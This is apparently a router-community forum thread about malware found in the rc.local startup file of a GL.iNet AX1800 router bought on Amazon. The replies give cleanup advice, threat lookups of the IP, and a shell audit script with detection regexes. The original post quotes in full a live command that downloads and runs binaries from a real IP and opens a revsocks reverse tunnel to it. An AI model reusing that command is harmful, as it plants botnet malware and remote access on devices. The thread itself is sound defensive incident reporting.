Virus on device bought from Amazon

Hi everyone,
I have the AX1800 Flint freshly installed (version 4.5.0) and, checking the logs, I saw that the router is trying to connect to an IP (see below); 16 engines flagged it in VirusTotal.
After checking again, I found that the IP is in the rc.local file (startup), which contains the following…

cd /tmp; wget http://94.156.68.104/narm7; chmod +x *; /tmp/narm7 glizzy; wget http://94.156.68.104/revsocksarm; mv revsocksarm revsocks; chmod +x *; ./revsocks -connect 94.156.68.104:808 -pass whatthefuckisacdnorpassword -recn 0 -q &

Is it fine? Why is the password that one?
Suggestions?
Thanks!

JUAN PABLO

Hi,

Where did you buy it?
It seems to be infected with a reverse proxy shell, so I would assume someone is trying to harm you.

Do Not Use the Compromised Device!
Disconnect it from your network immediately to prevent further malicious activity or data leakage.

Check whether your whole network is safe. Change default passwords, etc.

Since the device has been tampered with, you should reflash a fresh copy of the firmware using U-Boot asap: Debrick via Uboot - GL.iNet Router Docs

Amazon. I just flashed it with new firmware from the website…
I’ll try to flash it again with a new image.
Thanks for the reply

You must use U-Boot: Debrick via Uboot - GL.iNet Router Docs
Flashing normally will not remove persistent threats.

Depending on your country and situation, you should try to file a complaint or even contact local law-enforcement agencies. In that case, you should leave the router as it is, since it is evidence (and don’t use it anymore).

It kinda looks like you got a used device, imho :wink: If you don’t trust it due to persistence, flash the image via U-Boot; this will re-create all partitions.

Edit: ^ also, it is really important to use U-Boot, because U-Boot erases the partitions fully; just an upgrade will still have possibilities to keep persistence through things like /root/ or /etc/sysupgrade.conf.

revsocks is a tool like shadowsocks; however, this is why you still need to see it as a threat no matter what.

It can also be done with the intention to man-in-the-middle your traffic / spy on you, or maybe tamper with downloads by drive-by.

It is not a virus, but clearly someone used this router before, either with malicious intent or not.

Whether it is a persistent threat or not, I think it is too early to know.

Often, for many APT actors, normal people are not super important, unless you are a programmer with repo access (download servers) to infect most of the people in a really fast time, an ISP, a business, or for political reasons, or being an investor.

But it doesn’t mean they can make mistakes, or it is just a solo hacker with that intent.

I would advise checking your most critical devices, such as Windows, understanding what you downloaded during the time it was present (did you accept certificates on sites?), maybe reinstalling if you don’t trust it, and checking the connections to the outside for anything strange.

Edit:
Also, I did some research on this IP.

According to URLhaus and VirusTotal, it’s falling under Mirai botnet activity.

So report it and clean it :+1:

Did you read “update security”? Looks like that’s your situation. Also, flag it on Amazon as fraud.
https://dl.gl-inet.com/

Hmmm… just out of curiosity, I ran a quick search.

The IP address 94.156.68.104 belongs to limenet [dot] io. Limenet rents out server space.

URLhaus (a respected malware tracker project) identifies 94.156.68.104 as “While the URL referenced below has been used by bad actors to spread malware in the past, the malicious content has obviously been removed around 2022-12-20.” BUT, it looks like something is still going on at that IP as an automated review pulled a payload on 2024-02-21 (there has been nothing found since).

So… yeah. UBOOT to install a new image.

I would definitely report this to Amazon and police as Amazon are unwittingly taking part in a physical malware delivery system. How many devices did you connect to it? Did you get any ‘connection not secure’ warnings?

Hi Everyone,
I have installed a syslog and dropped all the logs there. You can see that it tried 20 times, then it “gave up” and couldn’t do anything. On the other hand, having that code there scared me a bit…
The router was purchased brand new in a sealed box from Amazon. I have used it since January and then installed a couple of plug-ins to try… maybe I got the code in the startup from them…

All PCs at home were scanned today and no virus… just in case, I did format and changed almost all passwords…
Thanks!

Could you tell me how you went about finding the infection in the first place? As in, what do you have to click in order to detect it’s there? I ask as I also have an AX1800 from Amazon but know nothing about system logs.

If this was not updated and was on the internet for a month or longer in a vulnerable state it would not surprise me that it was pulled into a botnet.
Edited: missed an important “not” in the sentence. Apologies.

For the past few weeks, my internet has been sluggish. Despite multiple calls to my ISP, they repeatedly advised me to reboot my router, claiming everything was fine. Frustrated, I set up a syslog server to monitor the logs (you can see them in a friendly way). After each reboot, I noticed repeated attempts to connect to a suspicious external IP address. Curious, I investigated further and found malware-related activity on VirusTotal or just Google. Upon examining the startup scripts, I discovered additional scripts containing the problematic lines mentioned earlier.

See the image where you can see the place where the script was…
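
The startup locations named in this thread (rc.local, /etc/sysupgrade.conf, /root/) can be checked for the download-and-execute shape the OP found. The script below is an added example for this discussion, not GL.iNet code or anything posted by a participant; the indicator regexes, the file list in the comment, and the constructed sample (TEST-NET address, made-up binary names) are all assumptions.

```shell
#!/bin/sh
# Hypothetical audit script written for this thread (not GL.iNet's code). It scans
# an OpenWrt startup file for the shape of the rc.local payload the OP found:
# a fetch from a bare IPv4 address, chmod +x in /tmp, a binary run out of /tmp,
# or a "-connect host:port" reverse-tunnel flag. On a router you would run it over
# /etc/rc.local /etc/sysupgrade.conf /etc/crontabs/root /root/.profile (assumed list).
# One extended regex per line; these indicators are assumptions, tune to your baseline.
INDICATORS='(wget|curl)[^;|&]*https?://[0-9]{1,3}(\.[0-9]{1,3}){3}
chmod \+x[^;|&]*(\*|/tmp)
(^|[; ])/tmp/[A-Za-z0-9_.-]+
-connect [^ ]+:[0-9]+'

# scan_startup_file FILE: print each suspicious line on stderr and the number
# of suspicious lines on stdout (0 if FILE is missing). Blank and comment lines skip.
scan_startup_file() {
  hits=0
  [ -r "$1" ] || { echo 0; return 0; }
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in ''|'#'*) continue ;; esac
    matched=$(printf '%s\n' "$INDICATORS" | while IFS= read -r re; do
      if printf '%s\n' "$line" | grep -Eq -- "$re"; then echo "$re"; break; fi
    done)
    if [ -n "$matched" ]; then
      hits=$((hits + 1))
      printf 'SUSPICIOUS %s [%s]: %s\n' "$1" "$matched" "$line" >&2
    fi
  done < "$1"
  echo "$hits"
}

# make_sample_rc_local: write a constructed rc.local with one benign line and two
# lines in the shape quoted in the thread (TEST-NET address, fake names, placeholder).
make_sample_rc_local() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
# constructed sample rc.local for the audit demo
/etc/init.d/dnsmasq restart
cd /tmp; wget http://203.0.113.10/dropper; chmod +x *; /tmp/dropper arg &
./tunnel -connect 203.0.113.10:808 -pass PLACEHOLDER -recn 0 -q &
exit 0
EOF
  echo "$f"
}

sample=$(make_sample_rc_local)
echo "constructed sample: $(scan_startup_file "$sample") suspicious line(s)"   # 2
rm -f "$sample"
```

A hit only means a line deserves a manual look; a clean result says nothing about persistence elsewhere on the flash, which is why the U-Boot reflash advice above still stands.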

Can you email us with your Amazon order number: support at glinet.biz

Need to investigate in more detail.

Ok, at your attention, Alzhao?
BTW I purchased it in November

Yes, please also refer to this thread.

I would assume that this is the issue here. Not all plugins might be safe to use. Plugins are always 3rd party and should be handled with care.

It would make me wonder if the virus was already there as the device fell out of the Amazon package.

When I wrote my first comments I wasn’t aware that you already used your device for plenty of weeks. :sunglasses:

I wouldn’t be surprised if the device was tampered with; often you see this happen with crypto wallets too 😉

Otherwise I would assume more people had this. And was it a third-party seller?

Interestingly enough, Mirai scans for telnet, but telnet is not open by default; it can be a fork which leverages other exploits, but my first thought is the seller.

Also, when they do that with crypto wallets, they can sell them with preinstalled keys, even completely sealed.

Yes, I’m almost sure it came from the plug-ins that you can download from the router…
Anyway, before wiping it out yesterday I tried again (isolated from the rest of the network) to test some of the plug-ins that I had installed before, but all were clean…

Yes, you are right… Maybe in the next update some anti-virus/malware would be a good idea!

BTW I installed (before formatting) ClamAV… All good!

I’m interested to hear which plugins you installed, so maybe I can avoid this in future.

I have installed a few on my routers (6 in total) :wink:

Thanks!